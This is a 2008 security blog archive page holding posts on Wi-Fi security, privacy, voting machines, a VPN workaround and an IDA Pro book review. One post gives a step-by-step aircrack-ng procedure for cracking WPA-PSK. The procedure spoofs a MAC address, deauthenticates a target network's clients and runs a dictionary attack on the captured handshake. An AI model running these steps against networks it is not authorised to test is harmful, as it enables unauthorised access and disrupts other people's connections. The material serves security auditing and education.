From the monthly archives:

August 2008

WPA2: The secure way…

by prithpal on August 31, 2008

in SBN

It has been over two years now since presentations and tools for cracking WEP and WPA keys began to appear all over the internet and in print: tools for auditing wireless networks, tools for security auditing and, of course, tools "for educational purposes only". Over that time these tools have been updated with better and more features.

Even after frequent reminders about the implications of the WEP vulnerabilities, many administrators are still deploying WEP, or WPA with a dictionary-word passphrase. My recent post about cracking WPA demonstrates the flaw of a weak passphrase in a WPA implementation.

The point I am making here is that even though the manufacturers of various Wi-Fi devices are aware of these facts, they are still shipping products with weak authentication protocols; I am sure it won't take another round of VC funding to update the firmware. In today's scenario all it takes is to make WPA2 the only authentication method available on those devices, with a requirement for a long passphrase mixing digits and letters so that a dictionary attack fails. (WPA2-PSK derives its key from the passphrase in exactly the same way WPA-PSK does, so it is the passphrase, not the protocol version, that defeats the dictionary attack.)

But then, if there were no viruses there would be no anti-virus market; likewise, many alternative devices and solutions for Wi-Fi security have popped up lately.

I guess it should be mandatory for manufacturers of Wi-Fi devices to comply with a strict policy of updating their products and firmware, especially for products that form the first line of defense of a network.


Rent "Hacking Democracy", the 2006 HBO documentary

by Frederick on August 31, 2008

in SBN

It's a good introduction for a non-specialist. It leaves some things out, and I spotted one really minor error, but it's worth your time.


WPA crack with Backtrack 3

by prithpal on August 30, 2008

in SBN

This video demonstrates WPA-PSK cracking with an offline dictionary attack against a captured four-way handshake; all tools used in the demonstration ship with BackTrack 3.

BackTrack is a live, open-source Linux distribution for security penetration testing. It merged two of the best such distributions, WHAX and Auditor, into one that has become an ethical hacker's first choice for security auditing. It comes loaded with tools for network mapping, information gathering and vulnerability identification, and even some for Bluetooth hacking.

Commands used in the video (step by step):

1) airmon-ng stop wlan0 (stop any monitor-mode interface left over from earlier runs)

2) ifconfig wlan0 down

3) macchanger --mac 00:11:22:33:44:55 wlan0 (spoof the card's MAC address while the interface is down)

4) airmon-ng start wlan0 (put the card into monitor mode; with some drivers this creates a separate interface such as ath0 or mon0, and that name must then be used in the steps below)

5) airodump-ng wlan0 (list nearby networks and note the target's BSSID and channel)

6) airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0 (capture only the target network, writing to (file name)-01.cap; leave this running)

7) aireplay-ng -0 5 -a (bssid) wlan0 (in a second terminal, send 5 deauthentication bursts so a connected client reconnects and airodump-ng catches the four-way handshake; airodump-ng's header reads "WPA handshake: (bssid)" once it has one, and without that aircrack-ng has nothing to test candidates against)

8) aircrack-ng -w (dictionary location) (file name)-01.cap (try every word in the dictionary against the captured handshake)

Click here to view the embedded video.

Backtrack can be downloaded from here


SANS Network Security 2008

by davehull on August 29, 2008

in SBN

I will be heading to Las Vegas for SANS Network Security 2008. I will be attending Kevin Johnson's Web Application Penetration Testing In-Depth course. Johnson is of Intelguardians fame, the founder of the Basic Analysis and Security Engine project. BASE is a Snort analysis database and front end. Johnson is also the driver of Samurai, the web application penetration testing LiveCD I wish I'd had three months ago so I would not have cluttered my base OS with so many tools.

I'm psyched about going to NS2008. The last time I was in Vegas was for Black Hat 2006.

If I've met you online via Twitter or through the PaulDotCom.com IRC channel and you're going to be in Vegas, let's meet up and grab a beer. And if you're Kevin Johnson or Ed Skoudis, I've already promised you a round.


If you have nothing to hide, you have nothing to fear?

by Frederick on August 29, 2008

in SBN

A three-year-old in Dorset, England, is having trouble sleeping at night. She's afraid there's a man outside watching her.

There's a reason. Government employees were following her family to and from school for three weeks, making records such as "female and three children enter target vehicle and drive off" and "curtains open and all lights on in premises".

But, we are told, we have to trade some privacy for security. Let's take a look at the public safety implications, and see if they justify following kids to school and scaring a three-year-old.

The surveillance was to assess whether the family really lived in the catchment area of the school they applied to. (They did, by the way.)

The Poole borough spying case.

Ask tough questions if your government tells you they need to invade your privacy in the name of security.


"[T]he case could be treated as terrorism"

by Frederick on August 29, 2008

in SBN

Gary McKinnon admits that he went into US government computers without permission.

He was sitting at home in his bathrobe looking around for evidence that the US government had secret alien technology taken from UFOs.

He got into many machines, working alone and without being particularly sophisticated. If you're a US taxpayer, take that as a sign that the computers you're paying for are being badly administered. If a computer is important enough to prosecute someone over, it's important enough to protect well enough that a random eccentric can't get in.

BBC profile of Gary McKinnon
"The authorities have warned that without his co-operation and a guilty plea the case could be treated as terrorism and he could face a long jail sentence."


How are voting machines tested?

by Frederick on August 29, 2008

in SBN

I've written before about the limitations on the "certification" of voting machines.

There's been more talk about it recently. Wired magazine's criticism of voting machine testing notes that problems go years without being fixed, and that the testing consists of going down a checklist that often has nothing to do with reliability or security. Worse, the software running in your election may be different from the software that got certified. University of Iowa computer science professor Douglas Jones proposes testing procedures for voting machines including election-day tests aimed at catching malicious software that gives the right answers until it sees it's in a real election.

Nobody in those discussions mentions a key point. If you could make software reliable by testing it, we'd see a lot fewer bugs in our daily lives. Security is even harder to test for than reliability: a program can run just fine and be insecure.

The way to get secure software is to start at the design stage and build it from the ground up to resist or detect attack. For example, the software that adds up the vote totals from the precincts shouldn't allow the machine operator to change the totals without even creating a record of the change. One widely used design did allow that.

The next step in improving software security is to let qualified people, lots of them, look for hidden flaws. That includes cryptographers, but also the kinds of sideways-thinking people who like solving puzzles and doing things that are supposed to be impossible.


Juniper SSL VPN and Firefox on Windows whitepage work around

by James.Costello on August 29, 2008

in SBN

My company does a lot of work with Juniper SSL VPN implementations.

There has been some odd behavior in Firefox on Windows machines when connecting to a Juniper SSL VPN. Immediately after login, users are taken to a blank white page whose URL contains data/home/starter0.cgi?check=yes. The page you should have been redirected to is data/home/starter.cgi?check=yes.

Juniper's suggested workaround is to go back to the sign-in screen and log in again, or to remove the 0 between starter and .cgi. Both are manual solutions; wouldn't it be easier to have an automatic one?

Well here it is.

Download the Firefox add on Redirector - https://addons.mozilla.org/en-US/firefox/addon/5064

After installation you will need to restart Firefox

Open Redirector by right clicking on the R in the status bar in Firefox

Click Add…

The Example url is the full url you get stuck on i.e. https://this.ismyexample.com/data/home/starter0.cgi?check=yes

The Include Pattern is https://this.ismyexample.com/data/home/starter0.*

Redirect to is https://this.ismyexample.com/data/home/starter.cgi?check=yes

Set the Pattern Type to Wildcard and click Test pattern

You should get a message that indicates that the pattern matches. If not go back and check your typing.

Click Ok

Click Close

Go back and log in again. You should go right past the page you were getting stuck at previously.

Be safe


James


Ok, I admit... the typical readers of Scientific American are probably not the most Internet-savvy folks out there, but I actually loved Herbert H. Thompson's article "How I Stole Someone's Identity." Mr. Thompson does a good job of explaining how to footprint a person online and begin compromising account after account of theirs simply by using the password-reset feature and the "security questions" used to validate identity.
For many of us, the abundance of personal information we put online, combined with the popular model of sending a password-reset e-mail, has our online security resting unsteadily on the shoulders of one or two e-mail accounts. In Kim's case some of that information came from a blog, but it could just as easily have come from a MySpace page, a sibling's blog (mentioning their birthday, mom's name, etcetera) or from any number of places online.
To someone who has been around information security for a while, none of this is news. This is actually a little old-school: footprint and crack. The problem is that in the old days the hacker would have to go to great lengths to investigate their marks. As this article shows, those days are gone; now a simple web search turns up almost everything about a person. All of our digital shadows are getting longer, and keeping track of every account we've signed up for is getting more and more difficult.
It's also critical to remember that once you put data online, it's almost impossible to delete it later. The more you blog about yourself and the more details you put in your social networking profiles, the more information about you is archived, copied, backed up and analyzed almost immediately. Think first, post later.
Great article and well worth the read.

I'll be posting more about the new risk model in the 2.0 world soon.


Book Review: The IDA Pro Book

by Dino Dai Zovi on August 29, 2008

in SBN

Chris Eagle’s long-awaited The IDA Pro Book has a very straightforward title, but it is perhaps the most descriptive title possible for this book.  It is simply the IDA Pro book.  The book weighs in at 640 pages and really does an excellent job of covering everything from the basic usage of IDA to using the SDK to extend IDA’s capabilities.  While IDA Pro comes with documentation, it is nowhere near as comprehensive or easy to read.

Chris Eagle is clearly an excellent educator, as he makes the sometimes very dense and technically involved material easy to read and understand and also chooses his examples well.  One of my personal favorites is an extended example on writing an IDA processor module for Python bytecode.  The bytecode’s simple stack language made it easy to focus on the specifics of writing IDA processor modules without getting bogged down in architectural details.  The amount of material spent on how to extend IDA is also unique to this book.

This book does not cover the basics of the x86 architecture and x86 assembly, so it is assumed that the reader is already familiar with it.  The book also does not spend too much time on showing how to identify high-level language constructs (functions, C++ virtual methods, switch tables, loops, etc) in assembly.  After all, this is a book on how to use IDA, not a book on how to read disassembly.  For an extensive treatment on how to read disassembly, check out Kris Kaspersky’s Hacker Disassembling Uncovered or Eldad Eilam’s Reversing: Secrets of Reverse Engineering.

There are several skill levels of IDA Pro users.  The casual (can follow strings or imports references to interesting functions), experienced (can use custom structures to make code easier to read), advanced (can turn assembly into C pseudocode manually), and professional (can write custom IDC scripts and plugins to automate repetitive and/or difficult tasks).  This book makes getting to the higher levels much easier and should really be considered an essential purchase along with an IDA license for any serious user.

